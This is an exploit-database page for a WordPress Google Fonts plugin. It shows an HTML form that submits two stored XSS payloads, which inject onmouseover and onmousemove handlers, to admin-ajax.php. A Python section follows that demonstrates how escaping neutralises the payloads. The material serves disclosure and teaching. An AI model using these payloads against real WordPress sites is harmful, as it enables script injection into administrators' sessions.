## https://sploitus.com/exploit?id=WPEX-ID:53702281-1BD5-4828-B7A4-9F81CF0B6BB6
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
        <input type="hidden" name="action" value="googlefont_action" />
        <input type="hidden" name="googlefont_ajax_name" value='" onmouseover=alert(/XSS-1/) t="' />
        <input type="hidden" name="googlefont_ajax_family" value='"onmousemove=alert(/XSS-2/)//' />
        <input type="submit" value="Submit request" />
    </form>
    <script>
      var form1 = document.getElementById('hack');
      //form1.submit();
    </script>
  </body>
</html>


The XSS payload in googlefont_ajax_name is triggered when the mouse moves over any of the checkboxes. The one in googlefont_ajax_family is triggered only in sections 1 and 4.
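Why the two field values above end up as event handlers, and what output escaping does to them, as an added example that is not part of the original page or the plugin's code. The checkbox template is an assumption, since the plugin's real markup is not shown here; the payload strings are the ones from the form.

```python
from html import escape
from html.parser import HTMLParser

# Payload values copied from the form fields on this page.
PAYLOADS = {
    "googlefont_ajax_name": '" onmouseover=alert(/XSS-1/) t="',
    "googlefont_ajax_family": '"onmousemove=alert(/XSS-2/)//',
}

# Hypothetical output template (assumption): a stored value echoed into a
# double-quoted attribute of a settings-page checkbox.
TEMPLATE = '<input type="checkbox" name="font" value="{value}">'


class HandlerFinder(HTMLParser):
    """Collects event-handler attribute names (on*) from every start tag."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def injected_handlers(markup):
    finder = HandlerFinder()
    finder.feed(markup)
    finder.close()
    return finder.handlers


def render_raw(value):
    # Vulnerable pattern: the stored value reaches the attribute unescaped,
    # so its leading double quote closes value="..." early.
    return TEMPLATE.format(value=value)


def render_escaped(value):
    # Fixed pattern: escape on output. quote=True also encodes " and ',
    # which is what esc_attr() does for attribute values in WordPress.
    return TEMPLATE.format(value=escape(value, quote=True))


def audit():
    """Maps each field to (handlers when raw, handlers when escaped)."""
    return {field: (injected_handlers(render_raw(v)),
                    injected_handlers(render_escaped(v)))
            for field, v in PAYLOADS.items()}
```

Both values begin with a double quote, so unescaped output turns the rest of the string into new attributes; once the quote is encoded as `&quot;` the whole string stays inside `value`.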